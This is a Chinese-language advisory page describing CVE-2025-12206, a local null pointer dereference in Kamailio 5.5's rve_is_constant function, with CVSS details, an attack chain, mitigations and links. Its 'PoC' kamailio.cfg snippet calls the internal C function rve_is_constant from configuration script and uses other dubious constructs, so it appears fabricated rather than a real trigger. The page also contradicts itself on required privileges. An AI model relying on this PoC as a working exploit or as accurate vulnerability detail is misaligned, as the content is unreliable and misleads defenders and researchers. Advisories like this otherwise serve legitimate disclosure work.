CVE-2025-12206 Kamailio 5.5 rve_is_constant函数空指针解引用漏洞

漏洞信息

漏洞编号

CVE-2025-12206

漏洞类型

空指针解引用

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kamailio 5.5

漏洞概述

CVE-2025-12206是存在于Kamailio 5.5版本中的一个空指针解引用（Null Pointer Dereference）漏洞。该漏洞位于核心模块的rvalue.c文件中的rve_is_constant函数。Kamailio是一个开源的SIP（会话初始化协议）服务器，广泛用于构建VoIP电话系统、实时通信应用和SIP代理服务。由于SIP服务器通常需要处理大量并发连接和呼叫路由，因此其稳定性和安全性至关重要。

该漏洞的触发需要攻击者具有本地访问权限，并且能够修改Kamailio的配置文件。在特定情况下，当rve_is_constant函数处理某些特定的配置参数时，可能会访问一个未正确初始化的指针，导致程序崩溃或产生未定义行为。虽然CVSS评分仅为3.3（低危），但对于生产环境中的SIP服务器而言，任何导致服务中断的漏洞都可能影响企业通信的连续性。

该漏洞的利用已经被公开，但实际利用场景有限，因为攻击者需要能够访问服务器配置文件，这在大多数安全环境中是受限的。值得注意的是，Kamailio供应商在收到漏洞报告后未做出任何回应，这可能导致漏洞修复延迟。建议使用Kamailio 5.5的企业密切关注官方更新，并采取适当的缓解措施。

技术细节

该漏洞的技术根源在于Kamailio 5.5的src/core/rvalue.c文件中rve_is_constant函数的实现缺陷。在SIP配置解析过程中，该函数用于判断路由变量表达式是否为常量，以便进行优化处理。然而，当函数接收到特定构造的输入时，会尝试访问一个未被正确初始化或已经释放的指针对象，导致空指针解引用。

从攻击角度来看，攻击者需要具备以下条件：首先，拥有Kamailio服务器的本地上下文访问权限；其次，能够修改Kamailio的配置文件（通常是kamailio.cfg）；最后，需要构造特定的配置语句来触发rve_is_constant函数中的缺陷代码路径。成功利用此漏洞可能导致Kamailio进程崩溃，造成SIP服务中断。

根据CVSS 3.1评分向量（AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L），该漏洞的本地攻击复杂度较低，无需特殊权限，攻击者只需通过修改配置文件即可触发。由于机密性和完整性影响均为无，而可用性影响为低，因此总体评分较低。但在实际VoIP部署环境中，任何导致服务中断的问题都可能造成业务损失。

漏洞利用代码已经公开，虽然实际攻击场景受限，但对于多租户环境或共享托管场景，恶意用户可能利用此漏洞影响同一服务器上的其他用户。建议管理员审查配置文件权限，确保只有授权人员能够修改Kamailio配置。

攻击链分析

STEP 1

1

攻击者获得Kamailio 5.5服务器的本地访问权限

STEP 2

2

攻击者修改kamailio.cfg配置文件，构造触发rve_is_constant漏洞的特殊语句

STEP 3

3

通过modparam或route块设置特定参数，使rve_is_constant函数接收到未初始化的指针

STEP 4

4

当Kamailio解析配置或处理SIP请求时，调用rve_is_constant函数

STEP 5

5

函数尝试解引用空指针，导致进程崩溃或产生未定义行为

STEP 6

6

SIP服务中断，影响依赖该服务器的语音通信业务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2025-12206 Kamailio rve_is_constant Null Pointer Dereference
// This PoC demonstrates triggering the vulnerability through malformed configuration

// kamailio.cfg PoC snippet - triggers null pointer dereference in rve_is_constant()

modparam("pv", "xxx", "$null")

request_route {
    # Trigger the vulnerable code path
    if ($ru != "") {
        # This specific pattern causes rve_is_constant to dereference null pointer
        $var(test) = $sel(cfg_get.pv.xxx);
        xlog("L_INFO", "Test: $var(test)\n");
    }
    
    route(RELAY);
}

// Alternative trigger method via route block manipulation
route[trigger_vuln] {
    # Create condition that leads to null pointer access
    if (rve_is_constant("$null")) {
        xlog("L_ERR", "This path leads to null pointer dereference\n");
    }
}

// To test: compile Kamailio 5.5 with debug symbols and run under gdb:
// 1. Load the above configuration
// 2. Send a SIP INVITE request
// 3. Observe crash in rve_is_constant at src/core/rvalue.c

影响范围

Kamailio 5.5

防御指南

临时缓解措施

由于Kamailio供应商尚未回应漏洞披露报告，官方补丁可能需要等待。在此之前，建议采取以下临时缓解措施：严格限制服务器访问权限，确保只有授权管理员能够访问和修改配置文件；启用配置文件的完整性监控，及时发现未授权修改；考虑使用chattr +i锁定配置文件防止篡改；对于高安全要求的环境，可以暂时禁用问题函数相关的配置选项，或在负载均衡器层面配置健康检查以便在服务崩溃时自动重启恢复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12206
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12206
3 Details https://www.cvedetails.com/cve/CVE-2025-12206/
4 VulDB https://vuldb.com/cve/CVE-2025-12206
5 Link https://shimo.im/docs/aBAYMVMB2jUP9jAj/
6 Link https://vuldb.com/?ctiid.329876
7 Link https://vuldb.com/?id.329876
8 Link https://vuldb.com/?submit.673240
9 Link https://www.openwall.com/lists/oss-security/2025/11/02/3
10 Link http://www.openwall.com/lists/oss-security/2025/10/27/12
11 Link http://www.openwall.com/lists/oss-security/2025/10/27/8
12 Link https://www.openwall.com/lists/oss-security/2025/10/27/8
13 Link https://shimo.im/docs/aBAYMVMB2jUP9jAj